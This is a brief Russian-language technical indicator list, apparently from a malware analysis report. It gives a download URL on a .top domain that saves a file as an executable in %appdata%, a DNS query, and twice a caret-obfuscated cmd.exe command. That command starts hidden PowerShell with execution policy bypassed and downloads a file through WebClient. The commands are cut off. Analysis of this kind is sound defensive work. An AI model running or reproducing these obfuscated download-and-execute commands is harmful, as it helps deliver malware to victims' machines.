Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^WER^SH^E^ll.ex^e^ -eXECUTiO^nP^Oli^c^y^ by^pass^ -^NopR^ofile -^wI^NDO^WSTY^lE^ h^i^DDEn (^new-OBject^ ^S^ysT^EM.NE^T.wEb^c^l^i^eNT^).D^oW^nlo^AdF^IL^e^('http://www.doo...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "P^o^WER^SH^E^ll.ex^e^ -eXECUTiO^nP^Oli^c^y^ by^pass^ -^NopR^ofile -^wI^NDO^WSTY^lE^ h^i^DDEn (^new-OBject^ ^S^ysT^EM.NE^T.wEb^c^l^i^eNT^).D^oW^nlo^AdF^IL^e^('http://www.doo...' (со скрытым окном)